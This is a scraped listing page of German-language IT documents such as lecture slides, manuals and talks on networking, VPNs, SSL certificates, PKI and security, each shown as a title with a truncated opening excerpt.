1.) Nennen Sie Aufgaben und mögliche Dienste der Transportschicht (Transport Layer) des ISO/OSI-Schichtenmodells. Übung 7 1.) Nennen Sie Aufgaben und mögliche Dienste der Transportschicht (Transport Layer) des ISO/OSI-Schichtenmodells. 2.) Charakterisieren Sie kurz das User Datagram Protokoll (UDP) aus der Internetprotokollfamilie

Mehr

OpenVPN @ LuXeria. VPN für die LuXeria. Emanuel Duss 2015-02-12. Emanuel Duss OpenVPN @ LuXeria 2015-02-12 1 / 21

OpenVPN @ LuXeria. VPN für die LuXeria. Emanuel Duss 2015-02-12. Emanuel Duss OpenVPN @ LuXeria 2015-02-12 1 / 21 OpenVPN @ LuXeria VPN für die LuXeria Emanuel Duss 2015-02-12 Emanuel Duss OpenVPN @ LuXeria 2015-02-12 1 / 21 OpenVPN Virtual Private Network VPN: Tunnel zwischen zwei Rechnern Sichere Kommunikation Aufsatz

Mehr

Webmin mit SSL Unterstützung

Webmin mit SSL Unterstützung Webmin mit SSL Unterstützung Installation Für die Installation werden benötigt: Net_SSLeay.pm-1.05.tar.gz webmin-0.80.tar.gz mögliche Zusatzmodule: backup_1.0.wbm ipchains-0.80.1.wbm nettools-0.79.1.wbm

Mehr

TOPAL ZERTIFIKAT MANAGER ANLEITUNG ZUR ERSTELLUNG VON ZERTIFIKATEN

TOPAL ZERTIFIKAT MANAGER ANLEITUNG ZUR ERSTELLUNG VON ZERTIFIKATEN TOPAL ZERTIFIKAT MANAGER ANLEITUNG ZUR ERSTELLUNG VON ZERTIFIKATEN Version Date Author Status Comment 0.1 21.09.2014 Hunkeler Bruno In work Initial Version 1.0 12.11.2014 Hunkeler Bruno Final Final Version

Mehr

Sichere Identitäten in Smart Grids

Sichere Identitäten in Smart Grids Informationstag "IT-Sicherheit im Smart Grid" Berlin, 23.05.2012 Sichere Identitäten in Smart Grids Dr. Thomas Störtkuhl, Agenda 1 2 Beispiele für Kommunikationen Digitale Zertifikate: Basis für Authentifizierung

Mehr

USB-Tokens. Technik und Einsatzgebiete

USB-Tokens. Technik und Einsatzgebiete USB-Tokens Technik und Einsatzgebiete Vortrag im Rahmen der Lehrveranstaltung Chipkartensysteme und E-Payment im SS05 an der Fachhochschule Bonn-Rhein-Sieg Outline Passwortmanager PKI Smartcards USB-Tokens

Mehr

Modul 2: Zusammenspiel der Verfahren: Authentisierung, Verschlüsselung und Schlüsselmanagement

Modul 2: Zusammenspiel der Verfahren: Authentisierung, Verschlüsselung und Schlüsselmanagement Modul 2: Zusammenspiel der Verfahren: Authentisierung, und Schlüsselmanagement M. Leischner nsysteme II Folie 1 Gegenseitige, symmetrische, dynamische Authentisierung und Authentisierung rnd-c A RANDOM

Mehr

Analyse eines gehackten Webservers unter Linux. 12.11.2010 IT-SecX Dipl.-Ing. (FH) Georg Höllrigl

Analyse eines gehackten Webservers unter Linux. 12.11.2010 IT-SecX Dipl.-Ing. (FH) Georg Höllrigl Analyse eines gehackten Webservers unter Linux 12.11.2010 IT-SecX Dipl.-Ing. (FH) Georg Höllrigl 1 Portrait Georg Höllrigl HTL St. Pölten - Elektronik / Technische Informatik 8 Jahre Erfahrung als Systemadministrator

Mehr

CAcert - Freie Zertifikate

CAcert - Freie Zertifikate CAcert - Freie Zertifikate Vortrag zum Software Freedom Day, Hamburg Martin Gummi & Fabian Schubert 2010-09-18 CAcert - Freie Zertifikate Seite 1 http://www.cacert.org Guck mal wer da spricht Fabian Schubert

Mehr

Implementierungsrichtlinie. Datenaustausch BESTELLUNGEN / AUFTRAG. auf Basis von ASCII-Dateien

Implementierungsrichtlinie. Datenaustausch BESTELLUNGEN / AUFTRAG. auf Basis von ASCII-Dateien Implementierungsrichtlinie Datenaustausch BESTELLUNGEN / AUFTRAG auf Basis von ASCII-Dateien Version 1.23, September 2015 Neue Funktion Endkundenrechnung (siehe roten Text)! Neue Möglichkeiten Komplett-/Teillieferung

Mehr

ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide

ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide ALL1681 Wireless 802.11g Powerline Router Quick Installation Guide 1 SET ALL1681 Upon you receive your wireless Router, please check that the following contents are packaged: - Powerline Wireless Router

Mehr

Zertifikate Exchange Server / WLAN. Referent: Marc Grote

Zertifikate Exchange Server / WLAN. Referent: Marc Grote Zertifikate Exchange Server / WLAN Referent: Marc Grote Agenda Verwendungszweck von Zertifikaten Krytografiegrundlagen Symmetrische / Asymmetrische Verschluesselungsverfahren Windows Zertifizierungsstellen

Mehr

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein:

Folgende Voraussetzungen für die Konfiguration müssen erfüllt sein: 7. Intrusion Prevention System 7.1 Einleitung Sie konfigurieren das Intrusion Prevention System um das Netzwerk vor Angriffen zu schützen. Grundsätzlich soll nicht jeder TFTP Datenverkehr blockiert werden,

Mehr

Digitale Identitäten in der Industrieautomation

Digitale Identitäten in der Industrieautomation Digitale Identitäten in der Industrieautomation Basis für die IT Security Dr. Thomas Störtkuhl TÜV SÜD AG, Embedded Systems 1 Agenda Kommunikationen: Vision, Beispiele Digitale Zertifikate: Basis für Authentifizierung

Mehr

Mac OS X Consoliero Teil 14: Webmail Agent unter Mac OS X Server 10.2

Mac OS X Consoliero Teil 14: Webmail Agent unter Mac OS X Server 10.2 Mac OSX Consoliero Teil 14 Seite: 1/10 Mac OS X Consoliero Weiterführende Dokumentationen für Administratoren. Mac OS X Consoliero Teil 14: Webmail Agent unter Mac OS X Server 10.2 Christoph Müller, PTS

Mehr

Seminar Internet-Technologie

Seminar Internet-Technologie Seminar Internet-Technologie Zertifikate, SSL, SSH, HTTPS Christian Kothe Wintersemester 2008 / 2009 Inhalt Asymmetrisches Kryptosystem Digitale Zertifikate Zertifikatsformat X.509 Extended-Validation-Zertifikat

Mehr

Rechnernetze Übung 12

Rechnernetze Übung 12 Rechnernetze Übung 12 Frank Weinhold Professur VSR Fakultät für Informatik TU Chemnitz Juli 2011 Sie kennen sicherlich sogenannte Web-Mailer, also WWW-Oberflächen über die Sie Emails lesen und vielleicht

Mehr

Hacken von implementierungsspezifischen! SSL-Schwachstellen

Hacken von implementierungsspezifischen! SSL-Schwachstellen Hacken von implementierungsspezifischen! SSL-Schwachstellen Basic-Constraints-Schwachstelle Null-Präfix-Attacke Thomas Konrad, FH St. Pölten, Studiengang IT Security, is072033@fhstp.ac.at Wozu SSL? Authentizität

Mehr

Neue E Mail Einstellungen für POP3- und IMAP Benutzer

Neue E Mail Einstellungen für POP3- und IMAP Benutzer Computing Centre Rechenzentrum Rechenzentrum Neue E Mail Einstellungen für POP3- und IMAP Benutzer Diese Information richtet sich an Sie, wenn Sie auf Ihre E Mail mit dem POP3- oder IMAP Protokoll zugreifen,

Mehr

Denn es geht um ihr Geld:

Denn es geht um ihr Geld: Denn es geht um ihr Geld: [A]symmetrische Verschlüsselung, Hashing, Zertifikate, SSL/TLS Warum Verschlüsselung? Austausch sensibler Daten über das Netz: Adressen, Passwörter, Bankdaten, PINs,... Gefahr

Mehr

SMTP Sicherheit mit DANE sys4.de

SMTP Sicherheit mit DANE sys4.de SMTP Sicherheit mit DANE sys4.de EMiG :-) > STARTTLS für Kunden verbindend > STARTTLS zwischen EMiG-Teilnehmern > Die EMiG-Teilnehmer decken einen grossen Anteil an deutschen Mailnutzern ab EMiG :-( >

Mehr

Wie installiere ich das CAcert Root-Zertifikat?

Wie installiere ich das CAcert Root-Zertifikat? Wie installiere ich das CAcert Root-Zertifikat? 1. Internet Explorer / Outlook...1 2. Mozilla...4 3. Firefox...4 4. Thunderbird...5 5. Opera...9 1. Internet Explorer / Outlook Bitte gehen Sie zu der Adresse

Mehr

SSL Konfiguration des Mailclients

SSL Konfiguration des Mailclients English translation is given in this typo. Our translations of software-menus may be different to yours. Anleitung für die Umstellung der unsicheren IMAP und POP3 Ports auf die sicheren Ports IMAP (993)

Mehr

Client/Server-Systeme

Client/Server-Systeme Frühjahrsemester 2011 CS104 Programmieren II / CS108 Programmier-Projekt Java-Projekt Kapitel 3: /Server-Architekturen H. Schuldt /Server-Systeme Ein zweischichtiges /Server-System ist die einfachste Variante

Mehr

Stammtisch 04.12.2008. Zertifikate

Stammtisch 04.12.2008. Zertifikate Stammtisch Zertifikate Ein Zertifikat ist eine Zusicherung / Bestätigung / Beglaubigung eines Sachverhalts durch eine Institution in einem definierten formalen Rahmen 1 Zertifikate? 2 Digitale X.509 Zertifikate

Mehr

MOUNT10 StoragePlatform Console

MOUNT10 StoragePlatform Console MOUNT10 StoragePlatform Console V7.14 Kurzmanual für Microsoft Windows Ihr Leitfaden für die Verwaltung der MOUNT10 Backup-Umgebung unter Verwendung der Storage Platform Console Inhaltsverzeichnis 1 VERWENDUNGSZWECK...3

Mehr

KONFIGURATION DES MOZILLA E-MAIL CLIENT

KONFIGURATION DES MOZILLA E-MAIL CLIENT KONFIGURATION DES MOZILLA E-MAIL CLIENT Copyright 2004 by 2 ways - media & design, Inh. Lars Plessmann, Paulinenstr. 12, D-70178 Stuttgart. http://www.2-ways.de Lars.Plessmann@2-ways.de Der Mozilla Email

Mehr

PHOTOVOLTAIK PREISLISTE 1/2012. Fachgroßhandel für Photovoltaik PV-Equipment und Services

PHOTOVOLTAIK PREISLISTE 1/2012. Fachgroßhandel für Photovoltaik PV-Equipment und Services PHOTOVOLTAIK PREISLISTE 1/2012 Fachgroßhandel für Photovoltaik PV-Equipment und Services ABA CDEDF DBCD FDFDF FBD A B CDE F F E B FAF BABD D A B D B A BB B D DDFA DD D F AB C DEF DBC F DE BF FEF D D FC

Mehr

bacula The Network Backup Solution

bacula The Network Backup Solution bacula The Network Backup Solution Betriebssysteme Client Server Linux X X FreeBSD X X OpenBSD X NetBSD X X Mac OS X X Windows X manchmal IRIX X Konzept Director Datenbank File Daemon Meta- Daten Storage

Mehr

Load balancing Router with / mit DMZ

Load balancing Router with / mit DMZ ALL7000 Load balancing Router with / mit DMZ Deutsch Seite 3 English Page 10 ALL7000 Quick Installation Guide / Express Setup ALL7000 Quick Installation Guide / Express Setup - 2 - Hardware Beschreibung

Mehr

Ein- und Ausgabe von Paketen für Netzwerkverbindungen 208

Ein- und Ausgabe von Paketen für Netzwerkverbindungen 208 Ein- und Ausgabe von Paketen für Netzwerkverbindungen 208 Zwischen Dienste-Anbietern und ihren Klienten auf dem Netzwerk besteht häufig ein ähnliches Verhältnis wie zwischen einer Shell und dem zugehörigen

Mehr

Einführung in OpenSSL und X.509-Zertifikate. Martin Kaiser http://www.kaiser.cx/

Einführung in OpenSSL und X.509-Zertifikate. Martin Kaiser http://www.kaiser.cx/ Einführung in OpenSSL und X.509-Zertifikate Martin Kaiser http://www.kaiser.cx/ Über mich Elektrotechnik-Studium Uni Karlsruhe System-Ingenieur UNIX und IP-Netze (2001-2003) Embedded Software-Entwicklung

Mehr

MLB Charity Fashion Show

MLB Charity Fashion Show MLB Charity Fashion Show ein Event für MLB Charity Fashion Show ein Event für krebskranke Kinder Sponsorenkonzept Sponsorenkonzept Eine Fashion Show zur Unterstützung der gemeinnützigen Organisation: Eine

Mehr

1. IPsec Verbindung zwischen Gateway und IPsec Client - Host

1. IPsec Verbindung zwischen Gateway und IPsec Client - Host 1. IPsec Verbindung zwischen Gateway und IPsec Client - Host 1.1 Einleitung Im Folgenden wird die Konfiguration einer IPsec Verbindung zwischen einem Bintec IPsec Gateway und dem Bintec IPsec Client beschrieben.

Mehr

Sicherheitskonzept und Sicherheitspru fung. Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR

Sicherheitskonzept und Sicherheitspru fung. Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR Sicherheitskonzept und Sicherheitspru fung Internetanbindung Befundserver MVZ Labor PD Dr. Volkmann und Kollegen GbR Einführung Die Firma MVZ Labor PD Dr. Volkmann und Kollegen GbR, nachstehend als Labor

Mehr

Standardtastatur Deutsch, Schweiz Die Deutschschweizer-Tastatur hat fünf Tottasten (Tottaste, Zeichen Sonderzeichen):

Standardtastatur Deutsch, Schweiz Die Deutschschweizer-Tastatur hat fünf Tottasten (Tottaste, Zeichen Sonderzeichen): Standardtastatur Deutsch Schweiz Die DeutschschweizerTastatur hat fünf Tottasten (Tottaste Zeichen Sonderzeichen) 1 2 @ 3 # 4 ^ ` ~ 5 6 7 8 9 0 ' ^ ~ Q W E R T Z U I O < \ A S D F G H J K L Y X C V B N

Mehr

Digicomp Microsoft Evolution Day 2015 1. ADFS Oliver Ryf. Partner:

Digicomp Microsoft Evolution Day 2015 1. ADFS Oliver Ryf. Partner: 1 ADFS Oliver Ryf Partner: 2 Agenda Begrüssung Vorstellung Referent Active Directory Federation Services (ADFS) F&A Weiterführende Kurse 3 Vorstellung Referent Seit 1991 IT-Trainer 1995 MCSE und MCT Seit

Mehr

check_cisco_voice Dokumentation

check_cisco_voice Dokumentation check_cisco_voice Dokumentation Inhaltsverzeichnis 1. Vorbereitung...2 2. Verwendung...3 2.1 Usage / Parameter...3 2.2 Modi...5 2.2.1 Lern-Modus...5 2.2.2 Interface-Modus...6 2.2.3 Gesamtstatus...8 2.2.4

Mehr

Tuning des Weblogic /Oracle Fusion Middleware 11g. Jan-Peter Timmermann Principal Consultant PITSS

Tuning des Weblogic /Oracle Fusion Middleware 11g. Jan-Peter Timmermann Principal Consultant PITSS Tuning des Weblogic /Oracle Fusion Middleware 11g Jan-Peter Timmermann Principal Consultant PITSS 1 Agenda Bei jeder Installation wiederkehrende Fragen WievielForms Server braucheich Agenda WievielRAM

Mehr

Behebung des sog. Heartbleed-Bugs (CVE-2014-0160) in der Krypto-Bibliothek OpenSSL.

Behebung des sog. Heartbleed-Bugs (CVE-2014-0160) in der Krypto-Bibliothek OpenSSL. NCP Volume License Server (Win32/64) Service Release: 1.03 Build 004 Datum: Juli 2014 Open SSL Heartbleed-Bugs (CVE-2014-0160) Behebung des sog. Heartbleed-Bugs (CVE-2014-0160) in der Krypto-Bibliothek

Mehr

Enterprise java beans step-by-step

Enterprise java beans step-by-step Enterprise java beans step-by-step 0. Voraussetzungen Der Orion Server ist in C:\Orion installiert! Sollten schon Versuche diese Applikation zum Laufen zu bringen fehlgeschlagen sein, empfehle ich eine

Mehr

Softwareupdate-Anleitung // AC Porty L Netzteileinschub

Softwareupdate-Anleitung // AC Porty L Netzteileinschub 1 Softwareupdate-Anleitung // AC Porty L Netzteileinschub Softwareupdate-Anleitung // AC Porty L Netzteileinschub HENSEL-VISIT GmbH & Co. KG Robert-Bunsen-Str. 3 D-97076 Würzburg-Lengfeld GERMANY Tel./Phone:

Mehr

Lehrstuhl für Datenverarbeitung. Technische Universität München. Grundkurs C++ Dokumentation mit Doxygen

Lehrstuhl für Datenverarbeitung. Technische Universität München. Grundkurs C++ Dokumentation mit Doxygen Grundkurs C++ Dokumentation mit Doxygen Doxygen Überblick Grundkurs C++ 2 Doxygen doxygen g Erzeugt Doxyfile Konfigurationsdatei Kann mit Texteditor bearbeitet werden. doxygen Doxyfile Erzeugt Dokumentation

Mehr